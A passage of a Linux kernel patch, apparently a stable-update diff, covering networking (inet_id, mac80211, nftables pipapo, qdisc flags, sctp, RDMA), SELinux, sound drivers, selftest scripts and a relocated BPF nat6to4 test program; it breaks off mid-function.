++				     DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
++				     DEVLINK_RELOAD_LIMIT_UNSPEC,
++				     &actions_performed, NULL);
++		mutex_unlock(&devlink->lock);
++		if (err && err != -EOPNOTSUPP)
++			pr_warn("Failed to reload devlink instance into init_net\n");
++		devlink_put(devlink);
++	}
++}
++
++static struct pernet_operations devlink_pernet_ops __net_initdata = {
++	.pre_exit = devlink_pernet_pre_exit,
++};
++
++static int __init devlink_init(void)
++{
++	int err;
++
++	err = genl_register_family(&devlink_nl_family);
++	if (err)
++		goto out;
++	err = register_pernet_subsys(&devlink_pernet_ops);
++
++out:
++	WARN_ON(err);
++	return err;
++}
++
++subsys_initcall(devlink_init);
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index ebb737ac9e894..04853c83c85c4 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -340,7 +340,7 @@ lookup_protocol:
+ 	else
+ 		inet->pmtudisc = IP_PMTUDISC_WANT;
+ 
+-	inet->inet_id = 0;
++	atomic_set(&inet->inet_id, 0);
+ 
+ 	sock_init_data(sock, sk);
+ 
+diff --git a/net/ipv4/datagram.c b/net/ipv4/datagram.c
+index 4d1af0cd7d99e..cb5dbee9e018f 100644
+--- a/net/ipv4/datagram.c
++++ b/net/ipv4/datagram.c
+@@ -73,7 +73,7 @@ int __ip4_datagram_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len
+ 	reuseport_has_conns_set(sk);
+ 	sk->sk_state = TCP_ESTABLISHED;
+ 	sk_set_txhash(sk);
+-	inet->inet_id = get_random_u16();
++	atomic_set(&inet->inet_id, get_random_u16());
+ 
+ 	sk_dst_set(sk, &rt->dst);
+ 	err = 0;
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 08921b96f9728..f9b8a4a1d2edc 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -312,7 +312,7 @@ int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 					     inet->inet_daddr));
+ 	}
+ 
+-	inet->inet_id = get_random_u16();
++	atomic_set(&inet->inet_id, get_random_u16());
+ 
+ 	if (tcp_fastopen_defer_connect(sk, &err))
+ 		return err;
+@@ -1539,7 +1539,7 @@ struct sock *tcp_v4_syn_recv_sock(const struct sock *sk, struct sk_buff *skb,
+ 	inet_csk(newsk)->icsk_ext_hdr_len = 0;
+ 	if (inet_opt)
+ 		inet_csk(newsk)->icsk_ext_hdr_len = inet_opt->opt.optlen;
+-	newinet->inet_id = get_random_u16();
++	atomic_set(&newinet->inet_id, get_random_u16());
+ 
+ 	/* Set ToS of the new socket based upon the value of incoming SYN.
+ 	 * ECT bits are set later in tcp_init_transfer().
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index 0f81492da0b46..55dc0610e8633 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -1102,7 +1102,8 @@ static inline bool ieee80211_rx_reorder_ready(struct tid_ampdu_rx *tid_agg_rx,
+ 	struct sk_buff *tail = skb_peek_tail(frames);
+ 	struct ieee80211_rx_status *status;
+ 
+-	if (tid_agg_rx->reorder_buf_filtered & BIT_ULL(index))
++	if (tid_agg_rx->reorder_buf_filtered &&
++	    tid_agg_rx->reorder_buf_filtered & BIT_ULL(index))
+ 		return true;
+ 
+ 	if (!tail)
+@@ -1143,7 +1144,8 @@ static void ieee80211_release_reorder_frame(struct ieee80211_sub_if_data *sdata,
+ 	}
+ 
+ no_frame:
+-	tid_agg_rx->reorder_buf_filtered &= ~BIT_ULL(index);
++	if (tid_agg_rx->reorder_buf_filtered)
++		tid_agg_rx->reorder_buf_filtered &= ~BIT_ULL(index);
+ 	tid_agg_rx->head_seq_num = ieee80211_sn_inc(tid_agg_rx->head_seq_num);
+ }
+ 
+@@ -4162,6 +4164,7 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 					  u16 ssn, u64 filtered,
+ 					  u16 received_mpdus)
+ {
++	struct ieee80211_local *local;
+ 	struct sta_info *sta;
+ 	struct tid_ampdu_rx *tid_agg_rx;
+ 	struct sk_buff_head frames;
+@@ -4179,6 +4182,11 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 
+ 	sta = container_of(pubsta, struct sta_info, sta);
+ 
++	local = sta->sdata->local;
++	WARN_ONCE(local->hw.max_rx_aggregation_subframes > 64,
++		  "RX BA marker can't support max_rx_aggregation_subframes %u > 64\n",
++		  local->hw.max_rx_aggregation_subframes);
++
+ 	if (!ieee80211_rx_data_set_sta(&rx, sta, -1))
+ 		return;
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 4c2df7af73f76..3c5cac9bd9b70 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -10509,7 +10509,7 @@ static int nft_rcv_nl_event(struct notifier_block *this, unsigned long event,
+ 	deleted = 0;
+ 	mutex_lock(&nft_net->commit_mutex);
+ 	if (!list_empty(&nf_tables_destroy_list))
+-		rcu_barrier();
++		nf_tables_trans_destroy_flush_work();
+ again:
+ 	list_for_each_entry(table, &nft_net->tables, list) {
+ 		if (nft_table_has_owner(table) &&
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 32cfd0a84b0e2..8c16681884b7e 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -901,12 +901,14 @@ static void pipapo_lt_bits_adjust(struct nft_pipapo_field *f)
+ static int pipapo_insert(struct nft_pipapo_field *f, const uint8_t *k,
+ 			 int mask_bits)
+ {
+-	int rule = f->rules++, group, ret, bit_offset = 0;
++	int rule = f->rules, group, ret, bit_offset = 0;
+ 
+-	ret = pipapo_resize(f, f->rules - 1, f->rules);
++	ret = pipapo_resize(f, f->rules, f->rules + 1);
+ 	if (ret)
+ 		return ret;
+ 
++	f->rules++;
++
+ 	for (group = 0; group < f->groups; group++) {
+ 		int i, v;
+ 		u8 mask;
+@@ -1051,7 +1053,9 @@ static int pipapo_expand(struct nft_pipapo_field *f,
+ 			step++;
+ 			if (step >= len) {
+ 				if (!masks) {
+-					pipapo_insert(f, base, 0);
++					err = pipapo_insert(f, base, 0);
++					if (err < 0)
++						return err;
+ 					masks = 1;
+ 				}
+ 				goto out;
+@@ -1234,6 +1238,9 @@ static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,
+ 		else
+ 			ret = pipapo_expand(f, start, end, f->groups * f->bb);
+ 
++		if (ret < 0)
++			return ret;
++
+ 		if (f->bsize > bsize_max)
+ 			bsize_max = f->bsize;
+ 
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index 01d07e6a68119..e8f988e1c7e64 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -1550,10 +1550,28 @@ static int tc_get_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
+ 	return 0;
+ }
+ 
++static bool req_create_or_replace(struct nlmsghdr *n)
++{
++	return (n->nlmsg_flags & NLM_F_CREATE &&
++		n->nlmsg_flags & NLM_F_REPLACE);
++}
++
++static bool req_create_exclusive(struct nlmsghdr *n)
++{
++	return (n->nlmsg_flags & NLM_F_CREATE &&
++		n->nlmsg_flags & NLM_F_EXCL);
++}
++
++static bool req_change(struct nlmsghdr *n)
++{
++	return (!(n->nlmsg_flags & NLM_F_CREATE) &&
++		!(n->nlmsg_flags & NLM_F_REPLACE) &&
++		!(n->nlmsg_flags & NLM_F_EXCL));
++}
++
+ /*
+  * Create/change qdisc.
+  */
+-
+ static int tc_modify_qdisc(struct sk_buff *skb, struct nlmsghdr *n,
+ 			   struct netlink_ext_ack *extack)
+ {
+@@ -1647,27 +1665,35 @@ replay:
+ 				 *
+ 				 *   We know, that some child q is already
+ 				 *   attached to this parent and have choice:
+-				 *   either to change it or to create/graft new one.
++				 *   1) change it or 2) create/graft new one.
++				 *   If the requested qdisc kind is different
++				 *   than the existing one, then we choose graft.
++				 *   If they are the same then this is "change"
++				 *   operation - just let it fallthrough..
+ 				 *
+ 				 *   1. We are allowed to create/graft only
+-				 *   if CREATE and REPLACE flags are set.
++				 *   if the request is explicitly stating
++				 *   "please create if it doesn't exist".
+ 				 *
+-				 *   2. If EXCL is set, requestor wanted to say,
+-				 *   that qdisc tcm_handle is not expected
++				 *   2. If the request is to exclusive create
++				 *   then the qdisc tcm_handle is not expected
+ 				 *   to exist, so that we choose create/graft too.
+ 				 *
+ 				 *   3. The last case is when no flags are set.
++				 *   This will happen when for example tc
++				 *   utility issues a "change" command.
+ 				 *   Alas, it is sort of hole in API, we
+ 				 *   cannot decide what to do unambiguously.
+-				 *   For now we select create/graft, if
+-				 *   user gave KIND, which does not match existing.
++				 *   For now we select create/graft.
+ 				 */
+-				if ((n->nlmsg_flags & NLM_F_CREATE) &&
+-				    (n->nlmsg_flags & NLM_F_REPLACE) &&
+-				    ((n->nlmsg_flags & NLM_F_EXCL) ||
+-				     (tca[TCA_KIND] &&
+-				      nla_strcmp(tca[TCA_KIND], q->ops->id))))
+-					goto create_n_graft;
++				if (tca[TCA_KIND] &&
++				    nla_strcmp(tca[TCA_KIND], q->ops->id)) {
++					if (req_create_or_replace(n) ||
++					    req_create_exclusive(n))
++						goto create_n_graft;
++					else if (req_change(n))
++						goto create_n_graft2;
++				}
+ 			}
+ 		}
+ 	} else {
+@@ -1701,6 +1727,7 @@ create_n_graft:
+ 		NL_SET_ERR_MSG(extack, "Qdisc not found. To create specify NLM_F_CREATE flag");
+ 		return -ENOENT;
+ 	}
++create_n_graft2:
+ 	if (clid == TC_H_INGRESS) {
+ 		if (dev_ingress_queue(dev)) {
+ 			q = qdisc_create(dev, dev_ingress_queue(dev),
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index c806d272107ac..a11b0d903514c 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -98,7 +98,7 @@ struct percpu_counter sctp_sockets_allocated;
+ 
+ static void sctp_enter_memory_pressure(struct sock *sk)
+ {
+-	sctp_memory_pressure = 1;
++	WRITE_ONCE(sctp_memory_pressure, 1);
+ }
+ 
+ 
+@@ -9472,7 +9472,7 @@ void sctp_copy_sock(struct sock *newsk, struct sock *sk,
+ 	newinet->inet_rcv_saddr = inet->inet_rcv_saddr;
+ 	newinet->inet_dport = htons(asoc->peer.port);
+ 	newinet->pmtudisc = inet->pmtudisc;
+-	newinet->inet_id = get_random_u16();
++	atomic_set(&newinet->inet_id, get_random_u16());
+ 
+ 	newinet->uc_ttl = inet->uc_ttl;
+ 	newinet->mc_loop = 1;
+diff --git a/net/sunrpc/xprtrdma/verbs.c b/net/sunrpc/xprtrdma/verbs.c
+index b098fde373abf..28c0771c4e8c3 100644
+--- a/net/sunrpc/xprtrdma/verbs.c
++++ b/net/sunrpc/xprtrdma/verbs.c
+@@ -935,9 +935,6 @@ struct rpcrdma_rep *rpcrdma_rep_create(struct rpcrdma_xprt *r_xprt,
+ 	if (!rep->rr_rdmabuf)
+ 		goto out_free;
+ 
+-	if (!rpcrdma_regbuf_dma_map(r_xprt, rep->rr_rdmabuf))
+-		goto out_free_regbuf;
+-
+ 	rep->rr_cid.ci_completion_id =
+ 		atomic_inc_return(&r_xprt->rx_ep->re_completion_ids);
+ 
+@@ -956,8 +953,6 @@ struct rpcrdma_rep *rpcrdma_rep_create(struct rpcrdma_xprt *r_xprt,
+ 	spin_unlock(&buf->rb_lock);
+ 	return rep;
+ 
+-out_free_regbuf:
+-	rpcrdma_regbuf_free(rep->rr_rdmabuf);
+ out_free:
+ 	kfree(rep);
+ out:
+@@ -1363,6 +1358,10 @@ void rpcrdma_post_recvs(struct rpcrdma_xprt *r_xprt, int needed, bool temp)
+ 			rep = rpcrdma_rep_create(r_xprt, temp);
+ 		if (!rep)
+ 			break;
++		if (!rpcrdma_regbuf_dma_map(r_xprt, rep->rr_rdmabuf)) {
++			rpcrdma_rep_put(buf, rep);
++			break;
++		}
+ 
+ 		rep->rr_cid.ci_queue_id = ep->re_attr.recv_cq->res.id;
+ 		trace_xprtrdma_post_recv(rep);
+diff --git a/security/selinux/ss/policydb.c b/security/selinux/ss/policydb.c
+index adcfb63b3550d..6f9ff4643dcbc 100644
+--- a/security/selinux/ss/policydb.c
++++ b/security/selinux/ss/policydb.c
+@@ -2005,6 +2005,7 @@ static int filename_trans_read_helper(struct policydb *p, void *fp)
+ 		if (!datum)
+ 			goto out;
+ 
++		datum->next = NULL;
+ 		*dst = datum;
+ 
+ 		/* ebitmap_read() will at least init the bitmap */
+@@ -2017,7 +2018,6 @@ static int filename_trans_read_helper(struct policydb *p, void *fp)
+ 			goto out;
+ 
+ 		datum->otype = le32_to_cpu(buf[0]);
+-		datum->next = NULL;
+ 
+ 		dst = &datum->next;
+ 	}
+diff --git a/sound/pci/ymfpci/ymfpci.c b/sound/pci/ymfpci/ymfpci.c
+index 82d4e0fda91be..d62a0e2ddf609 100644
+--- a/sound/pci/ymfpci/ymfpci.c
++++ b/sound/pci/ymfpci/ymfpci.c
+@@ -150,8 +150,8 @@ static inline int snd_ymfpci_create_gameport(struct snd_ymfpci *chip, int dev, i
+ void snd_ymfpci_free_gameport(struct snd_ymfpci *chip) { }
+ #endif /* SUPPORT_JOYSTICK */
+ 
+-static int snd_card_ymfpci_probe(struct pci_dev *pci,
+-				 const struct pci_device_id *pci_id)
++static int __snd_card_ymfpci_probe(struct pci_dev *pci,
++				   const struct pci_device_id *pci_id)
+ {
+ 	static int dev;
+ 	struct snd_card *card;
+@@ -333,6 +333,12 @@ static int snd_card_ymfpci_probe(struct pci_dev *pci,
+ 	return 0;
+ }
+ 
++static int snd_card_ymfpci_probe(struct pci_dev *pci,
++				 const struct pci_device_id *pci_id)
++{
++	return snd_card_free_on_error(&pci->dev, __snd_card_ymfpci_probe(pci, pci_id));
++}
++
+ static struct pci_driver ymfpci_driver = {
+ 	.name = KBUILD_MODNAME,
+ 	.id_table = snd_ymfpci_ids,
+diff --git a/sound/soc/amd/Kconfig b/sound/soc/amd/Kconfig
+index 3968c478c9381..44d4e6e51a358 100644
+--- a/sound/soc/amd/Kconfig
++++ b/sound/soc/amd/Kconfig
+@@ -71,6 +71,7 @@ config SND_SOC_AMD_RENOIR_MACH
+ config SND_SOC_AMD_ACP5x
+ 	tristate "AMD Audio Coprocessor-v5.x I2S support"
+ 	depends on X86 && PCI
++	select SND_AMD_ACP_CONFIG
+ 	help
+ 	 This option enables ACP v5.x support on AMD platform
+ 
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index c1ca3ceac5f2f..9a9571c3f08c0 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -217,7 +217,7 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "82"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82V2"),
+ 		}
+ 	},
+ 	{
+@@ -248,6 +248,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 14 2022"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "M6500RC"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/cs35l41.c b/sound/soc/codecs/cs35l41.c
+index f2b5032daa6ae..2f4b0ee93aced 100644
+--- a/sound/soc/codecs/cs35l41.c
++++ b/sound/soc/codecs/cs35l41.c
+@@ -167,7 +167,7 @@ static int cs35l41_get_fs_mon_config_index(int freq)
+ static const DECLARE_TLV_DB_RANGE(dig_vol_tlv,
+ 		0, 0, TLV_DB_SCALE_ITEM(TLV_DB_GAIN_MUTE, 0, 1),
+ 		1, 913, TLV_DB_MINMAX_ITEM(-10200, 1200));
+-static DECLARE_TLV_DB_SCALE(amp_gain_tlv, 0, 1, 1);
++static DECLARE_TLV_DB_SCALE(amp_gain_tlv, 50, 100, 0);
+ 
+ static const struct snd_kcontrol_new dre_ctrl =
+ 	SOC_DAPM_SINGLE("Switch", CS35L41_PWR_CTRL3, 20, 1, 0);
+diff --git a/tools/testing/selftests/drivers/net/bonding/bond-break-lacpdu-tx.sh b/tools/testing/selftests/drivers/net/bonding/bond-break-lacpdu-tx.sh
+index 47ab90596acb2..6358df5752f90 100755
+--- a/tools/testing/selftests/drivers/net/bonding/bond-break-lacpdu-tx.sh
++++ b/tools/testing/selftests/drivers/net/bonding/bond-break-lacpdu-tx.sh
+@@ -57,8 +57,8 @@ ip link add name veth2-bond type veth peer name veth2-end
+ 
+ # add ports
+ ip link set fbond master fab-br0
+-ip link set veth1-bond down master fbond
+-ip link set veth2-bond down master fbond
++ip link set veth1-bond master fbond
++ip link set veth2-bond master fbond
+ 
+ # bring up
+ ip link set veth1-end up
+diff --git a/tools/testing/selftests/drivers/net/mlxsw/sharedbuffer.sh b/tools/testing/selftests/drivers/net/mlxsw/sharedbuffer.sh
+index 7d9e73a43a49b..0c47faff9274b 100755
+--- a/tools/testing/selftests/drivers/net/mlxsw/sharedbuffer.sh
++++ b/tools/testing/selftests/drivers/net/mlxsw/sharedbuffer.sh
+@@ -98,12 +98,12 @@ sb_occ_etc_check()
+ 
+ port_pool_test()
+ {
+-	local exp_max_occ=288
++	local exp_max_occ=$(devlink_cell_size_get)
+ 	local max_occ
+ 
+ 	devlink sb occupancy clearmax $DEVLINK_DEV
+ 
+-	$MZ $h1 -c 1 -p 160 -a $h1mac -b $h2mac -A 192.0.1.1 -B 192.0.1.2 \
++	$MZ $h1 -c 1 -p 10 -a $h1mac -b $h2mac -A 192.0.1.1 -B 192.0.1.2 \
+ 		-t ip -q
+ 
+ 	devlink sb occupancy snapshot $DEVLINK_DEV
+@@ -126,12 +126,12 @@ port_pool_test()
+ 
+ port_tc_ip_test()
+ {
+-	local exp_max_occ=288
++	local exp_max_occ=$(devlink_cell_size_get)
+ 	local max_occ
+ 
+ 	devlink sb occupancy clearmax $DEVLINK_DEV
+ 
+-	$MZ $h1 -c 1 -p 160 -a $h1mac -b $h2mac -A 192.0.1.1 -B 192.0.1.2 \
++	$MZ $h1 -c 1 -p 10 -a $h1mac -b $h2mac -A 192.0.1.1 -B 192.0.1.2 \
+ 		-t ip -q
+ 
+ 	devlink sb occupancy snapshot $DEVLINK_DEV
+@@ -154,16 +154,12 @@ port_tc_ip_test()
+ 
+ port_tc_arp_test()
+ {
+-	local exp_max_occ=96
++	local exp_max_occ=$(devlink_cell_size_get)
+ 	local max_occ
+ 
+-	if [[ $MLXSW_CHIP != "mlxsw_spectrum" ]]; then
+-		exp_max_occ=144
+-	fi
+-
+ 	devlink sb occupancy clearmax $DEVLINK_DEV
+ 
+-	$MZ $h1 -c 1 -p 160 -a $h1mac -A 192.0.1.1 -t arp -q
++	$MZ $h1 -c 1 -p 10 -a $h1mac -A 192.0.1.1 -t arp -q
+ 
+ 	devlink sb occupancy snapshot $DEVLINK_DEV
+ 
+diff --git a/tools/testing/selftests/net/Makefile b/tools/testing/selftests/net/Makefile
+index 69c58362c0edf..48d1a68be1d52 100644
+--- a/tools/testing/selftests/net/Makefile
++++ b/tools/testing/selftests/net/Makefile
+@@ -71,14 +71,60 @@ TEST_GEN_FILES += bind_bhash
+ TEST_GEN_PROGS += sk_bind_sendto_listen
+ TEST_GEN_PROGS += sk_connect_zero_addr
+ TEST_PROGS += test_ingress_egress_chaining.sh
++TEST_GEN_FILES += nat6to4.o
+ 
+ TEST_FILES := settings
+ 
+ include ../lib.mk
+ 
+-include bpf/Makefile
+-
+ $(OUTPUT)/reuseport_bpf_numa: LDLIBS += -lnuma
+ $(OUTPUT)/tcp_mmap: LDLIBS += -lpthread
+ $(OUTPUT)/tcp_inq: LDLIBS += -lpthread
+ $(OUTPUT)/bind_bhash: LDLIBS += -lpthread
++
++# Rules to generate bpf obj nat6to4.o
++CLANG ?= clang
++SCRATCH_DIR := $(OUTPUT)/tools
++BUILD_DIR := $(SCRATCH_DIR)/build
++BPFDIR := $(abspath ../../../lib/bpf)
++APIDIR := $(abspath ../../../include/uapi)
++
++CCINCLUDE += -I../bpf
++CCINCLUDE += -I../../../../usr/include/
++CCINCLUDE += -I$(SCRATCH_DIR)/include
++
++BPFOBJ := $(BUILD_DIR)/libbpf/libbpf.a
++
++MAKE_DIRS := $(BUILD_DIR)/libbpf
++$(MAKE_DIRS):
++	mkdir -p $@
++
++# Get Clang's default includes on this system, as opposed to those seen by
++# '-target bpf'. This fixes "missing" files on some architectures/distros,
++# such as asm/byteorder.h, asm/socket.h, asm/sockios.h, sys/cdefs.h etc.
++#
++# Use '-idirafter': Don't interfere with include mechanics except where the
++# build would have failed anyways.
++define get_sys_includes
++$(shell $(1) $(2) -v -E - </dev/null 2>&1 \
++	| sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') \
++$(shell $(1) $(2) -dM -E - </dev/null | grep '__riscv_xlen ' | awk '{printf("-D__riscv_xlen=%d -D__BITS_PER_LONG=%d", $$3, $$3)}')
++endef
++
++ifneq ($(CROSS_COMPILE),)
++CLANG_TARGET_ARCH = --target=$(notdir $(CROSS_COMPILE:%-=%))
++endif
++
++CLANG_SYS_INCLUDES = $(call get_sys_includes,$(CLANG),$(CLANG_TARGET_ARCH))
++
++$(OUTPUT)/nat6to4.o: nat6to4.c $(BPFOBJ) | $(MAKE_DIRS)
++	$(CLANG) -O2 -target bpf -c $< $(CCINCLUDE) $(CLANG_SYS_INCLUDES) -o $@
++
++$(BPFOBJ): $(wildcard $(BPFDIR)/*.[ch] $(BPFDIR)/Makefile)		       \
++	   $(APIDIR)/linux/bpf.h					       \
++	   | $(BUILD_DIR)/libbpf
++	$(MAKE) $(submake_extras) -C $(BPFDIR) OUTPUT=$(BUILD_DIR)/libbpf/     \
++		    EXTRA_CFLAGS='-g -O0'				       \
++		    DESTDIR=$(SCRATCH_DIR) prefix= all install_headers
++
++EXTRA_CLEAN := $(SCRATCH_DIR)
+diff --git a/tools/testing/selftests/net/bpf/Makefile b/tools/testing/selftests/net/bpf/Makefile
+deleted file mode 100644
+index 8ccaf8732eb22..0000000000000
+--- a/tools/testing/selftests/net/bpf/Makefile
++++ /dev/null
+@@ -1,14 +0,0 @@
+-# SPDX-License-Identifier: GPL-2.0
+-
+-CLANG ?= clang
+-CCINCLUDE += -I../../bpf
+-CCINCLUDE += -I../../../../lib
+-CCINCLUDE += -I../../../../../usr/include/
+-
+-TEST_CUSTOM_PROGS = $(OUTPUT)/bpf/nat6to4.o
+-all: $(TEST_CUSTOM_PROGS)
+-
+-$(OUTPUT)/%.o: %.c
+-	$(CLANG) -O2 -target bpf -c $< $(CCINCLUDE) -o $@
+-
+-EXTRA_CLEAN := $(TEST_CUSTOM_PROGS)
+diff --git a/tools/testing/selftests/net/bpf/nat6to4.c b/tools/testing/selftests/net/bpf/nat6to4.c
+deleted file mode 100644
+index ac54c36b25fc8..0000000000000
+--- a/tools/testing/selftests/net/bpf/nat6to4.c
++++ /dev/null
+@@ -1,285 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/*
+- * This code is taken from the Android Open Source Project and the author
+- * (Maciej Żenczykowski) has gave permission to relicense it under the
+- * GPLv2. Therefore this program is free software;
+- * You can redistribute it and/or modify it under the terms of the GNU
+- * General Public License version 2 as published by the Free Software
+- * Foundation
+-
+- * The original headers, including the original license headers, are
+- * included below for completeness.
+- *
+- * Copyright (C) 2019 The Android Open Source Project
+- *
+- * Licensed under the Apache License, Version 2.0 (the "License");
+- * you may not use this file except in compliance with the License.
+- * You may obtain a copy of the License at
+- *
+- *      http://www.apache.org/licenses/LICENSE-2.0
+- *
+- * Unless required by applicable law or agreed to in writing, software
+- * distributed under the License is distributed on an "AS IS" BASIS,
+- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+- * See the License for the specific language governing permissions and
+- * limitations under the License.
+- */
+-#include <linux/bpf.h>
+-#include <linux/if.h>
+-#include <linux/if_ether.h>
+-#include <linux/if_packet.h>
+-#include <linux/in.h>
+-#include <linux/in6.h>
+-#include <linux/ip.h>
+-#include <linux/ipv6.h>
+-#include <linux/pkt_cls.h>
+-#include <linux/swab.h>
+-#include <stdbool.h>
+-#include <stdint.h>
+-
+-
+-#include <linux/udp.h>
+-
+-#include <bpf/bpf_helpers.h>
+-#include <bpf/bpf_endian.h>
+-
+-#define IP_DF 0x4000  // Flag: "Don't Fragment"
+-
+-SEC("schedcls/ingress6/nat_6")
+-int sched_cls_ingress6_nat_6_prog(struct __sk_buff *skb)
+-{
+-	const int l2_header_size =  sizeof(struct ethhdr);
+-	void *data = (void *)(long)skb->data;
+-	const void *data_end = (void *)(long)skb->data_end;
+-	const struct ethhdr * const eth = data;  // used iff is_ethernet
+-	const struct ipv6hdr * const ip6 =  (void *)(eth + 1);
+-
+-	// Require ethernet dst mac address to be our unicast address.
+-	if  (skb->pkt_type != PACKET_HOST)
+-		return TC_ACT_OK;
+-
+-	// Must be meta-ethernet IPv6 frame
+-	if (skb->protocol != bpf_htons(ETH_P_IPV6))
+-		return TC_ACT_OK;
+-
+-	// Must have (ethernet and) ipv6 header
+-	if (data + l2_header_size + sizeof(*ip6) > data_end)
+-		return TC_ACT_OK;
+-
+-	// Ethertype - if present - must be IPv6
+-	if (eth->h_proto != bpf_htons(ETH_P_IPV6))
+-		return TC_ACT_OK;
+-
+-	// IP version must be 6
+-	if (ip6->version != 6)
+-		return TC_ACT_OK;
+-	// Maximum IPv6 payload length that can be translated to IPv4
+-	if (bpf_ntohs(ip6->payload_len) > 0xFFFF - sizeof(struct iphdr))
+-		return TC_ACT_OK;
+-	switch (ip6->nexthdr) {
+-	case IPPROTO_TCP:  // For TCP & UDP the checksum neutrality of the chosen IPv6
+-	case IPPROTO_UDP:  // address means there is no need to update their checksums.
+-	case IPPROTO_GRE:  // We do not need to bother looking at GRE/ESP headers,
+-	case IPPROTO_ESP:  // since there is never a checksum to update.
+-		break;
+-	default:  // do not know how to handle anything else
+-		return TC_ACT_OK;
+-	}
+-
+-	struct ethhdr eth2;  // used iff is_ethernet
+-
+-	eth2 = *eth;                     // Copy over the ethernet header (src/dst mac)
+-	eth2.h_proto = bpf_htons(ETH_P_IP);  // But replace the ethertype
+-
+-	struct iphdr ip = {
+-		.version = 4,                                                      // u4
+-		.ihl = sizeof(struct iphdr) / sizeof(__u32),                       // u4
+-		.tos = (ip6->priority << 4) + (ip6->flow_lbl[0] >> 4),             // u8
+-		.tot_len = bpf_htons(bpf_ntohs(ip6->payload_len) + sizeof(struct iphdr)),  // u16
+-		.id = 0,                                                           // u16
+-		.frag_off = bpf_htons(IP_DF),                                          // u16
+-		.ttl = ip6->hop_limit,                                             // u8
+-		.protocol = ip6->nexthdr,                                          // u8
+-		.check = 0,                                                        // u16
+-		.saddr = 0x0201a8c0,                            // u32
+-		.daddr = 0x0101a8c0,                                         // u32
+-	};
+-
+-	// Calculate the IPv4 one's complement checksum of the IPv4 header.
+-	__wsum sum4 = 0;
+-
+-	for (int i = 0; i < sizeof(ip) / sizeof(__u16); ++i)
+-		sum4 += ((__u16 *)&ip)[i];
+-
+-	// Note that sum4 is guaranteed to be non-zero by virtue of ip.version == 4
+-	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse u32 into range 1 .. 0x1FFFE
+-	sum4 = (sum4 & 0xFFFF) + (sum4 >> 16);  // collapse any potential carry into u16
+-	ip.check = (__u16)~sum4;                // sum4 cannot be zero, so this is never 0xFFFF
+-
+-	// Calculate the *negative* IPv6 16-bit one's complement checksum of the IPv6 header.
+-	__wsum sum6 = 0;
+-	// We'll end up with a non-zero sum due to ip6->version == 6 (which has '0' bits)
+-	for (int i = 0; i < sizeof(*ip6) / sizeof(__u16); ++i)
+-		sum6 += ~((__u16 *)ip6)[i];  // note the bitwise negation
+-
+-	// Note that there is no L4 checksum update: we are relying on the checksum neutrality
+-	// of the ipv6 address chosen by netd's ClatdController.
+-
+-	// Packet mutations begin - point of no return, but if this first modification fails
+-	// the packet is probably still pristine, so let clatd handle it.
+-	if (bpf_skb_change_proto(skb, bpf_htons(ETH_P_IP), 0))
+-		return TC_ACT_OK;
+-	bpf_csum_update(skb, sum6);
+-
+-	data = (void *)(long)skb->data;
+-	data_end = (void *)(long)skb->data_end;
+-	if (data + l2_header_size + sizeof(struct iphdr) > data_end)
+-		return TC_ACT_SHOT;
+-
+-	struct ethhdr *new_eth = data;
+-
+-	// Copy over the updated ethernet header
+-	*new_eth = eth2;
+-
+-	// Copy over the new ipv4 header.
+-	*(struct iphdr *)(new_eth + 1) = ip;
+-	return bpf_redirect(skb->ifindex, BPF_F_INGRESS);
+-}
+-
+-SEC("schedcls/egress4/snat4")
+-int sched_cls_egress4_snat4_prog(struct __sk_buff *skb)
+-{
+-	const int l2_header_size =  sizeof(struct ethhdr);
+-	void *data = (void *)(long)skb->data;
+-	const void *data_end = (void *)(long)skb->data_end;
+-	const struct ethhdr *const eth = data;  // used iff is_ethernet
+-	const struct iphdr *const ip4 = (void *)(eth + 1);
+-
